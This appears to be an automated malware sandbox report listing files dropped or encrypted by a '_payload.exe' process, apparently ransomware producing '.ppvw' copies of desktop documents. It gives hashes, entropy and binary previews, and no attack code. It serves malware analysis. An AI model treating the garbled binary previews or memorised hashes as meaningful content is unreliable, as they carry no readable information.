                                                                                                                          Preview:UOOJJ}......DU.2.;...........K.l.7..m!.I......34..F....+....g.za.W..!%4..]..y.C1.z.....x.$0."S.{....[...U%...(..o....'.....I.y..d.....x<...mx.`...1..QE.yO........F...X0%.B..k.J...|Q.$.%[...v.......N.b85.-.....^..^...;...9.;...q.na.:.Q.Z.m>...re.[.WL$(..9....$......PNpt.O.A...?...wj3..S....b].d..ft..ju.!.9.. 3....y.v4...S.|..F,_mC2....q>..r.'o>z......m\.....p....+...Tx&..{.'.S.g....d.4.+'.....r...1.....C..g9.).".hg.E.G.2=......l......U.......Z.?.<.G..)..K........g...<..d.j.(....E.k....(....C.9.K2.......:^...e.S.].%....a......n.g|...`h....pJ.H..2Tr./.f2..(=.{..am....Wd}..L...6.sI.N.}..9a..4U.W..w).\.zYVB......P..a../L.....]..{.ti...kg.....<S..9=..f..f.A.E..Jj.,.{.E."^..}......o..nt..W...@.\g.....t0n..iy.jI.5s.......(oJI.=.p)......!......&....k....6..~.lWd..?......"..k...)|.e.g.e.....).gEf..W..9N..R.M3.u.......*".j..{p.W..G.U^yB}.nI..9.......V...^7.R....Oj.0...|.D..:.N...g.P.e.X..+......._/.,.....~......~..!.2m.........%m6u.j,Z.d.V5.r?...

                                                                                                                          C:\Users\user\Desktop\UOOJJOZIRH.mp3

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.831928353338814
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ovEXlIu2qnXshtiAFqvf6ChdCbSNDItay8bPZIWaFad6aRf0JjMlKdiKBP+bD:ovZ3y8bBUCChdCONf1IrFagaRcM1gUD
                                                                                                                          MD5:7737BC753F8C0E523131C6B5AB01577B
                                                                                                                          SHA1:133F71D7A79698624BACEEB0281ED42E93E264A5
                                                                                                                          SHA-256:59B7BCF9442C20D31830CA711656C32F71360AEB78CDD96AB01D9BC02D2729D2
                                                                                                                          SHA-512:5DBC8B690F679531D259D4A50E35DAE78C7037B031EAB49A58FDF7DEAC29B64AEEAF4C28D9F8699565D303985C76A615D2FD380E7E8A771D48B0F7D9794F3D05
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJy0Z.JM.*kr.i....T....i..g`x....6+...#a..II.`.F...d..^...+N.=..M.`.u...{...p8..E7....%#..\+7...M.sw ...y"!L...}..p..F.....O.XRV.*.=..J.-...eaVm.7..Pf..q........n..}..|xCd....D.._?M..}..Ej60c.<...]b. .M......o..../...I..2.s......`8)..%r..c.~.E.?z.G...!.....nB..W.....'.ZM-.w.... .I.......,../.....=pc....v.r.*..b..bR..:.+......(.0}.eCjf..k_...._^...~.'..$.E..{.../P.?u..z~.YvMC.v....|.J...E{...U|..Bz..5o_....E&2oZW.}}..._._?..z.?.7...#. c-NJ.;............r..t.IBx6.i..F@.........v...\.`..AO.`.$.F.8KO..LDd..g.... .........=..U.......y...s..p%Bt.t...........s..............+<."..R.S........c.g..P.l...~.T.d+.(za._.#..Na.!.jT!...`....?*..DM.*X.c..RJK..H..t=...c.....;.........P...&...=-.}..%..T.5"...k.2....x?......k.g|O8.U.......B.Tm.?..-{........8..y......|4..(w.5..~._..q;.>..RsG...?..e..._!C2..JE..l.E..A..z...h....r.;.....I.DY.....aGMe....#g..S&..C...^&.-.??..YR(....^A..j.U...f..........h.FI..un.n..4*Qj....'.]^9.k2.2..;...c.....>...E.....lc....

                                                                                                                          C:\Users\user\Desktop\UOOJJOZIRH.mp3.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.831928353338814
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:ovEXlIu2qnXshtiAFqvf6ChdCbSNDItay8bPZIWaFad6aRf0JjMlKdiKBP+bD:ovZ3y8bBUCChdCONf1IrFagaRcM1gUD
                                                                                                                          MD5:7737BC753F8C0E523131C6B5AB01577B
                                                                                                                          SHA1:133F71D7A79698624BACEEB0281ED42E93E264A5
                                                                                                                          SHA-256:59B7BCF9442C20D31830CA711656C32F71360AEB78CDD96AB01D9BC02D2729D2
                                                                                                                          SHA-512:5DBC8B690F679531D259D4A50E35DAE78C7037B031EAB49A58FDF7DEAC29B64AEEAF4C28D9F8699565D303985C76A615D2FD380E7E8A771D48B0F7D9794F3D05
                                                                                                                          Malicious:false
                                                                                                                          Preview:UOOJJy0Z.JM.*kr.i....T....i..g`x....6+...#a..II.`.F...d..^...+N.=..M.`.u...{...p8..E7....%#..\+7...M.sw ...y"!L...}..p..F.....O.XRV.*.=..J.-...eaVm.7..Pf..q........n..}..|xCd....D.._?M..}..Ej60c.<...]b. .M......o..../...I..2.s......`8)..%r..c.~.E.?z.G...!.....nB..W.....'.ZM-.w.... .I.......,../.....=pc....v.r.*..b..bR..:.+......(.0}.eCjf..k_...._^...~.'..$.E..{.../P.?u..z~.YvMC.v....|.J...E{...U|..Bz..5o_....E&2oZW.}}..._._?..z.?.7...#. c-NJ.;............r..t.IBx6.i..F@.........v...\.`..AO.`.$.F.8KO..LDd..g.... .........=..U.......y...s..p%Bt.t...........s..............+<."..R.S........c.g..P.l...~.T.d+.(za._.#..Na.!.jT!...`....?*..DM.*X.c..RJK..H..t=...c.....;.........P...&...=-.}..%..T.5"...k.2....x?......k.g|O8.U.......B.Tm.?..-{........8..y......|4..(w.5..~._..q;.>..RsG...?..e..._!C2..JE..l.E..A..z...h....r.;.....I.DY.....aGMe....#g..S&..C...^&.-.??..YR(....^A..j.U...f..........h.FI..un.n..4*Qj....'.]^9.k2.2..;...c.....>...E.....lc....

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ.pdf

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858461062165055
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:rCpSbFAv84wY9ao3VecYzw04edGJjsdxjiSVSWwNC0vFYhobD:r6SbFc84raoFnYzw04WxeSVS/vD
                                                                                                                          MD5:2F262971AEBA5CB50CAE3DFC84462B36
                                                                                                                          SHA1:A389B1634E12EE01B2AADA6F1C55BDB3ABAD0DC5
                                                                                                                          SHA-256:4A4C92EC8151EDC8EE754CE4E8E4CB73192970C4524D2CB3426AECF0895ADE4C
                                                                                                                          SHA-512:BF97BC29744693505DCCE4201A1DC559842BEBCD93FA373A6D40A3FA02731D34A0D8F90307529878C80EDF684A40083E8FE6D0F8650C485931396C9DC79969ED
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG...}../.D..HF.W.....7KX.u.4L.{..>......k...q..--w.+d9w....K..'O.H..p..E^.....46++h..+.......8....3...F.5._Q...|...\N.b.g...2.#............rG0.O.$.,.x)p.>.R.f^>..A..2}c....^i...A {v.s......3.BVuZ;u.......y.d..O...3a..$..D..*.5...0{...l.%S..g...|.(....o.a....7....R....i.....v.K.....?R.\.O....k....}...U.%....".6..@..Y.O.....C4...c.m>+.9.. f...9.XeZ..@..J...a./.......!.PS......<....u.G.}Q@N.Z.?)....,.!%.X....!..7k....!;@3(e.z\/.P.B..Jo...,...i.1..o.89z....k.'r..l%Dg0.!...?.uP!,.b....s.>.......w.s...,%..(rz.32....1.PD'.^.E.y..eF..9H.<W...~xRt...!7Sz..Y..|MgqD......Hz..!...^Z...y.<.`...............P.'..}.b..5Q=W.."pS<..d.y.T..Fr....>s.e.^{..v.*...Mwq.*e.f....DM....O....j.....4...*...N........b.m..ip\K...W..<`..Hntc8)...w..g/a.W..1..J......K..i..v.C.= .g.<...G....1~...Sk.5..W..;k@.....L...!.a.bY....Q.u=]..^.....2\d..1...J.).../.j.C."]&..-v...........T.>..j...P..........)..B..=.v.sg.$MF...K.,.....<sI..o.w.e...y..s?O.R.bG..J.=....b.....'...r.@5

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ.pdf.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.858461062165055
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:rCpSbFAv84wY9ao3VecYzw04edGJjsdxjiSVSWwNC0vFYhobD:r6SbFc84raoFnYzw04WxeSVS/vD
                                                                                                                          MD5:2F262971AEBA5CB50CAE3DFC84462B36
                                                                                                                          SHA1:A389B1634E12EE01B2AADA6F1C55BDB3ABAD0DC5
                                                                                                                          SHA-256:4A4C92EC8151EDC8EE754CE4E8E4CB73192970C4524D2CB3426AECF0895ADE4C
                                                                                                                          SHA-512:BF97BC29744693505DCCE4201A1DC559842BEBCD93FA373A6D40A3FA02731D34A0D8F90307529878C80EDF684A40083E8FE6D0F8650C485931396C9DC79969ED
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG...}../.D..HF.W.....7KX.u.4L.{..>......k...q..--w.+d9w....K..'O.H..p..E^.....46++h..+.......8....3...F.5._Q...|...\N.b.g...2.#............rG0.O.$.,.x)p.>.R.f^>..A..2}c....^i...A {v.s......3.BVuZ;u.......y.d..O...3a..$..D..*.5...0{...l.%S..g...|.(....o.a....7....R....i.....v.K.....?R.\.O....k....}...U.%....".6..@..Y.O.....C4...c.m>+.9.. f...9.XeZ..@..J...a./.......!.PS......<....u.G.}Q@N.Z.?)....,.!%.X....!..7k....!;@3(e.z\/.P.B..Jo...,...i.1..o.89z....k.'r..l%Dg0.!...?.uP!,.b....s.>.......w.s...,%..(rz.32....1.PD'.^.E.y..eF..9H.<W...~xRt...!7Sz..Y..|MgqD......Hz..!...^Z...y.<.`...............P.'..}.b..5Q=W.."pS<..d.y.T..Fr....>s.e.^{..v.*...Mwq.*e.f....DM....O....j.....4...*...N........b.m..ip\K...W..<`..Hntc8)...w..g/a.W..1..J......K..i..v.C.= .g.<...G....1~...Sk.5..W..;k@.....L...!.a.bY....Q.u=]..^.....2\d..1...J.).../.j.C."]&..-v...........T.>..j...P..........)..B..=.v.sg.$MF...K.,.....<sI..o.w.e...y..s?O.R.bG..J.=....b.....'...r.@5

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ\HTAGVDFUIE.xlsx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.847014193653233
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:WjJXJ8p9egwvaux5Vd+Ev+hBVLRK5ii+7AAVHuk3DE0eP103Zox+U39ShebD:Wj78ie47Ej5ldi6zHuiGdIZg6hcD
                                                                                                                          MD5:8C795FAE4D4E275474BE7979E3282B27
                                                                                                                          SHA1:7002D0773DCC3CBDF3480618F77CF313B5C54295
                                                                                                                          SHA-256:C93E7929D997BA8764D652F115564CFABAFCA093127E1E992B5B311686533B79
                                                                                                                          SHA-512:D81C84830A958B9F73BC8A3FAE87FA3FF2B2CF33041F6AD8210FE4F74A4524CEBED444CF15274CDBD17076AA9B9B2CF38945DEB1DAB83909F8803E122DB6F438
                                                                                                                          Malicious:false
                                                                                                                          Preview:HTAGVy.;.t+%u..D.....U.......HMUd.......a...<..6..^...^.....S....og....l....(.....a..yL..?..B6h.r0......>.7.4......../....@.,.`...q..e......].2.cZ`...f...o.[.]E....j....d.Gu...QcB..d..<^N.l.O2y6..p.y..........8...c.?r .t.e...B....g..w.......}).Hw.vX..sB.=. .a.......n.R.K...I.<...OW.....Yq......d0.[.../..qB.....uk.......,KM..fH..... F......#.Il@USAI..........};..sU.Z.Q..xA...0x.......*H.`....6..ee...Q<U.....A..].,.x.6...U..}..^...{2.m.Z..&T.>i.hG...f...5./._.....;;.P...=D.6...L.B..h.O...D..E..m...b.|.Hs...*..jC.{.6.j....b.0(..S.=..!.......X.=0v....?...J.....!.W.B....#...Xk.....W.9.G%...8. .d.. ...rJ.+,mK.....D..m...6..A...as..........W..N....q.|M. x.>....o[.f.#.Y.^7..B...O..HN,...H..cw......m....8..+..lVmo....0....u...5..Q...`.Q6.0.u..!:...G@.......=..F....>.5.OA.....&(....!?....m....'sc.o...U.Bz}.&.b~....F..k.7.c..\....&..o.....|f.5K.|X.5+.7(0..'O..M.].> ..<.B..J...T`..:S.c"M.g_..._...8+..;...7.<.^.....8p..4.b.i...3..a.j.*Z.+........[..C0k.

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.824015595353518
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:txuaRY7cygX8fDRF+y7LLoVwVpP6MqSnZvD9BL7YbD:nuaRxye8rRYMv+yPRZBCD
                                                                                                                          MD5:C53B42C31B3E7023D0841CB26E0B4344
                                                                                                                          SHA1:660C65DBA97517250296EFB8C973DE65E5190C77
                                                                                                                          SHA-256:504C8ADB754A99704D37FED42BC2D4FD27F89B72FE4F197FF603294D19359679
                                                                                                                          SHA-512:49CD236BFDBFD868940BBF803CDE87F6FA4DBD632234BD07B553995B500430FF888BB1F9CEACCE285D4B28A74F5EC36C6E530AC8EFC41D8F22E839D6F2290AD1
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQ#..9..D.._..D...'..<.M.4..LH._..R-G..r..@A.E.m.._.PO....[.&.....7.).j.H."....`.6.}u......'N...].OC.Fp...q....eh...p.....Q......... v.8...(.;.>\.`.......)....1.n@.S5?..F[&:..P.........Y.M...q..0.ch].Z...4..q..U.I.R....F..9[.'@..@q..w..o.5....,i...d..!.pX......0=KY\...$....^Xz..."..+Ok..%..,...7....\.|>3.4^.......p...t..i.c....w.P....p......]........l....N....n[.........?.....2...o.e.4.....}.;BB.n......X..[..J.S.|...H<.;]._..N..dD....l.k..N...H...d...pB.z.Uap......|...pi....v...+.;..I..N.}...d/..@u.Z.[...Y_.`.[Ghz.B..b.C..|.y.v.,.#..=B.E..u9......>.+._} y...Y.H..9KCcHQ8.1.5R.X.,..*oe.@x....6_8...P..5.....=...g.^0.p-(...l......o.!+.I9.,Y.+o..@O.R.i\.7.<`...k-$c'!Z.r.,l....(4CP.7"...JC?.{..f...P.... 2.l(.!B....RNF....'...c.%.L.s:.b'n..M..."2..u.k9...o......5...Y..y..)..-..,..Z.}.5._u([!d..bt7....8.....P*.f%h...13.!.../.Mr6...D.Nl.s..Vd..[p...2t......p..>.u...S.@.....Zh...VV..Q...v.^.0If..5.@<..._3...A8....`i....+..i.P..\.Z`j.u1O.R=

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ\NIKHQAIQAU.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.824015595353518
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:txuaRY7cygX8fDRF+y7LLoVwVpP6MqSnZvD9BL7YbD:nuaRxye8rRYMv+yPRZBCD
                                                                                                                          MD5:C53B42C31B3E7023D0841CB26E0B4344
                                                                                                                          SHA1:660C65DBA97517250296EFB8C973DE65E5190C77
                                                                                                                          SHA-256:504C8ADB754A99704D37FED42BC2D4FD27F89B72FE4F197FF603294D19359679
                                                                                                                          SHA-512:49CD236BFDBFD868940BBF803CDE87F6FA4DBD632234BD07B553995B500430FF888BB1F9CEACCE285D4B28A74F5EC36C6E530AC8EFC41D8F22E839D6F2290AD1
                                                                                                                          Malicious:false
                                                                                                                          Preview:NIKHQ#..9..D.._..D...'..<.M.4..LH._..R-G..r..@A.E.m.._.PO....[.&.....7.).j.H."....`.6.}u......'N...].OC.Fp...q....eh...p.....Q......... v.8...(.;.>\.`.......)....1.n@.S5?..F[&:..P.........Y.M...q..0.ch].Z...4..q..U.I.R....F..9[.'@..@q..w..o.5....,i...d..!.pX......0=KY\...$....^Xz..."..+Ok..%..,...7....\.|>3.4^.......p...t..i.c....w.P....p......]........l....N....n[.........?.....2...o.e.4.....}.;BB.n......X..[..J.S.|...H<.;]._..N..dD....l.k..N...H...d...pB.z.Uap......|...pi....v...+.;..I..N.}...d/..@u.Z.[...Y_.`.[Ghz.B..b.C..|.y.v.,.#..=B.E..u9......>.+._} y...Y.H..9KCcHQ8.1.5R.X.,..*oe.@x....6_8...P..5.....=...g.^0.p-(...l......o.!+.I9.,Y.+o..@O.R.i\.7.<`...k-$c'!Z.r.,l....(4CP.7"...JC?.{..f...P.... 2.l(.!B....RNF....'...c.%.L.s:.b'n..M..."2..u.k9...o......5...Y..y..)..-..,..Z.}.5._u([!d..bt7....8.....P*.f%h...13.!.../.Mr6...D.Nl.s..Vd..[p...2t......p..>.u...S.@.....Zh...VV..Q...v.^.0If..5.@<..._3...A8....`i....+..i.P..\.Z`j.u1O.R=

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.854406017970987
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9LFb77J3bv6j27HnNFvlynNxtOPTdCoGp02hy+ikOVfzIdR9+bD:9prJD6j27H8Nxt0TvGCf+y9zId78D
                                                                                                                          MD5:234FFD0BBB53EF688E46638EE001132C
                                                                                                                          SHA1:CED77323BED709330765E4FB6F4AD5257434BBA2
                                                                                                                          SHA-256:51BA931A534F404D402B17AF4EB0D53144F099AF33ACE3C1D00D9F8C13EFFE3C
                                                                                                                          SHA-512:528239E88056C26D9111F885487A27B5CB596D924D3F0DDA1C0A431007E6347D55F186B20EB6A534AE4F58DA7DFC9E06B1006D5AB405CAC8C2EFE19DD833A4F5
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.......|.U..9.....#.Yu1.e...^.J.....L..<..i.....@..Q.n.....(...Lj....V=fr.-...e3......b....O:u.:2..Vf.f....?,H.E.Cx.{.?...".*..%.gC...Y.".uW.[<v.............+....vPV\..@s&...(.."^.c;.KV..{..7F..I........j+h..4.+}rRa...x?.7$.]r+&...X.M.J.{T.......S.....$.B.......J.c...JV..H...,@}R..u.G%.O@7tA.}#k.t.;}|Kb..o....,.....O..W=...bxq.....C ..|Z.d....f..i[.5..#.~.ZM..[..GWF..jX..!.s...............e..i...t..@"..QS..K...k...ue9..<.@z..3.[3.Z...<...4.M...C....L..y....[.|.v ..*.2.....%..s..}.&......{ v..S6.f8t.........:[...........Fud .\?i3.<.........U.(.A.....|%.../..mkM$.\.<J40..s......F.>..x{..H..@n#..J.lyp.l.-Y.fh8_....j.8^U......8....._.x.XLK..l....j`._...T(.M.-.9.(s..oF0...:.j.......~.knY.#.....}.(.0....81.|..". .....G.OT0.Y.....jN1#.zvm......l..v:.....{~.(2..2..9|....u.\....%Mk..} 1i.....x..m.pH.q@jK.7/?..T{/....d9.U..k.%.3.k..1X\...4....2.z[wOY....^/.j..)..I}NQ.`v.-....X.X4....[._3...j......._....!.U..[t..:~.t.3~a........

                                                                                                                          C:\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docx.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.854406017970987
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:9LFb77J3bv6j27HnNFvlynNxtOPTdCoGp02hy+ikOVfzIdR9+bD:9prJD6j27H8Nxt0TvGCf+y9zId78D
                                                                                                                          MD5:234FFD0BBB53EF688E46638EE001132C
                                                                                                                          SHA1:CED77323BED709330765E4FB6F4AD5257434BBA2
                                                                                                                          SHA-256:51BA931A534F404D402B17AF4EB0D53144F099AF33ACE3C1D00D9F8C13EFFE3C
                                                                                                                          SHA-512:528239E88056C26D9111F885487A27B5CB596D924D3F0DDA1C0A431007E6347D55F186B20EB6A534AE4F58DA7DFC9E06B1006D5AB405CAC8C2EFE19DD833A4F5
                                                                                                                          Malicious:false
                                                                                                                          Preview:VLZDG.......|.U..9.....#.Yu1.e...^.J.....L..<..i.....@..Q.n.....(...Lj....V=fr.-...e3......b....O:u.:2..Vf.f....?,H.E.Cx.{.?...".*..%.gC...Y.".uW.[<v.............+....vPV\..@s&...(.."^.c;.KV..{..7F..I........j+h..4.+}rRa...x?.7$.]r+&...X.M.J.{T.......S.....$.B.......J.c...JV..H...,@}R..u.G%.O@7tA.}#k.t.;}|Kb..o....,.....O..W=...bxq.....C ..|Z.d....f..i[.5..#.~.ZM..[..GWF..jX..!.s...............e..i...t..@"..QS..K...k...ue9..<.@z..3.[3.Z...<...4.M...C....L..y....[.|.v ..*.2.....%..s..}.&......{ v..S6.f8t.........:[...........Fud .\?i3.<.........U.(.A.....|%.../..mkM$.\.<J40..s......F.>..x{..H..@n#..J.lyp.l.-Y.fh8_....j.8^U......8....._.x.XLK..l....j`._...T(.M.-.9.(s..oF0...:.j.......~.knY.#.....}.(.0....81.|..". .....G.OT0.Y.....jN1#.zvm......l..v:.....{~.(2..2..9|....u.\....%Mk..} 1i.....x..m.pH.q@jK.7/?..T{/....d9.U..k.%.3.k..1X\...4....2.z[wOY....^/.j..)..I}NQ.`v.-....X.X4....[._3...j......._....!.U..[t..:~.t.3~a........

                                                                                                                          C:\Users\user\Desktop\WUTJSCBCFX.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.832303683469432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:93sceUgZ2KAwMuxH5KNuFjbfAwZ7ENi9tLMeord2ytTvDzbD:FsJZzA4HkNk7Z7E0Lt0d5JDnD
                                                                                                                          MD5:51A05B96D6FFB5E33D494B5CB5C02E82
                                                                                                                          SHA1:72C7A07E5F3C6753DCCD65340EBB1AC6319C400E
                                                                                                                          SHA-256:F0EDDC4B27DE7FD89EBF36041D6326D5DE662EDC67FDB089803A71E0939FCFD1
                                                                                                                          SHA-512:0EFE5CABBB5067847C6F52E6AD15A1E3BAC375C936400E820FD2AFCD3F21A546570D1E0EE0E6BCCE8B0B5B1B18E6E0F8DB7FB647F96D86582EDDEBC64BC36D1A
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS8.E5;..E...<\q..F..M......B..".]..h.._yEc.2.2EG.S..`d,...P.......B...f.....[.`.i...g..p.b#t......U......i=..y.....e..`.........5.3^.Y..)7_...j._<....+...S.UN.....L...Q...8..;.D...l.OHn.Wl.#.w.5.....t..._.:gU...1wAfD.....9y8.2.&.cg~9.H...>..w.:..MY...v.F}..0&r.p......I).bp.8./...2.3RB.e=...>..u.=.Z..C.......C. .....c".....V.q..&..>.4.....d... .1.*....5.#\/.<>.@.Y.eK..i.k.8.Aa......<.3.q...Kz..W..x..XzdX../..e..h.^...+.v_.K......#..A.`-0F.!......l9.E.f..I.aH..C"..v..I.j..T.k......5q...[D$O...H.......G........kW.. ..<..........F_t...a...dYbU'.l.3h.B...5......^.T..^8.....O8...E.n......4.Q..8V.T.N...[..Z...q._...3..Vq9?..a...........Jj#..F..:.w.e`.?..J.....:....B%9y....0D^../.5...I.9.R....7.+....+).u..<o]..5....Y....h......... .Fu:d..~...5......Oy.&....Q...E.@....5....by......Z6.j4..m.....[...G...T....0'E.....!..l...'...?..q.].i9.([.[sG.C..}.Cu.yH.9.b....0..Fu^j.k5.:.k0...4._)....P}....U=...#N..fn._.$ty_dxb.....`Z..g..6..9V...t.$.

                                                                                                                          C:\Users\user\Desktop\WUTJSCBCFX.png.ppvw (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.832303683469432
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:93sceUgZ2KAwMuxH5KNuFjbfAwZ7ENi9tLMeord2ytTvDzbD:FsJZzA4HkNk7Z7E0Lt0d5JDnD
                                                                                                                          MD5:51A05B96D6FFB5E33D494B5CB5C02E82
                                                                                                                          SHA1:72C7A07E5F3C6753DCCD65340EBB1AC6319C400E
                                                                                                                          SHA-256:F0EDDC4B27DE7FD89EBF36041D6326D5DE662EDC67FDB089803A71E0939FCFD1
                                                                                                                          SHA-512:0EFE5CABBB5067847C6F52E6AD15A1E3BAC375C936400E820FD2AFCD3F21A546570D1E0EE0E6BCCE8B0B5B1B18E6E0F8DB7FB647F96D86582EDDEBC64BC36D1A
                                                                                                                          Malicious:false
                                                                                                                          Preview:WUTJS8.E5;..E...<\q..F..M......B..".]..h.._yEc.2.2EG.S..`d,...P.......B...f.....[.`.i...g..p.b#t......U......i=..y.....e..`.........5.3^.Y..)7_...j._<....+...S.UN.....L...Q...8..;.D...l.OHn.Wl.#.w.5.....t..._.:gU...1wAfD.....9y8.2.&.cg~9.H...>..w.:..MY...v.F}..0&r.p......I).bp.8./...2.3RB.e=...>..u.=.Z..C.......C. .....c".....V.q..&..>.4.....d... .1.*....5.#\/.<>.@.Y.eK..i.k.8.Aa......<.3.q...Kz..W..x..XzdX../..e..h.^...+.v_.K......#..A.`-0F.!......l9.E.f..I.aH..C"..v..I.j..T.k......5q...[D$O...H.......G........kW.. ..<..........F_t...a...dYbU'.l.3h.B...5......^.T..^8.....O8...E.n......4.Q..8V.T.N...[..Z...q._...3..Vq9?..a...........Jj#..F..:.w.e`.?..J.....:....B%9y....0D^../.5...I.9.R....7.+....+).u..<o]..5....Y....h......... .Fu:d..~...5......Oy.&....Q...E.@....5....by......Z6.j4..m.....[...G...T....0'E.....!..l...'...?..q.].i9.([.[sG.C..}.Cu.yH.9.b....0..Fu^j.k5.:.k0...4._)....P}....U=...#N..fn._.$ty_dxb.....`Z..g..6..9V...t.$.

                                                                                                                          C:\Users\user\Desktop\XZXHAVGRAG\KATAXZVCPS.png

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Local\efb86700-3538-49da-812c-9949f1bdad55\3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1360
                                                                                                                          Entropy (8bit):7.86000113476167
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:2y56WY2c1WruK/+qutvpmQRhR7t6FR870+DPPAdO8IRyETEsjeKR3if21OwbD:2ysf2BruFNZpmE35i28exf3HD
                                                                                                                          MD5:FD0E61AC3F843B3F2600C06E4AF74B7C
                                                                                                                          SHA1:3EEC150B794C4D7F26A17A53318C6205C79E5B48
                                                                                                                          SHA-256:6E88A3940592CD176C99EA8728AB3E045A9C9BFFF3CF32BD4CEEE633A5BF7486
                                                                                                                          SHA-512:F1EF65BB9EA74F4C2DEB7AF3727ECE2C251075D081F5DFD094F04518D8C2F84B6276673702EF4A7664FAE587E1006AA49F8D5FB486BA4B633647A9EB24BE4074
                                                                                                                          Malicious:false
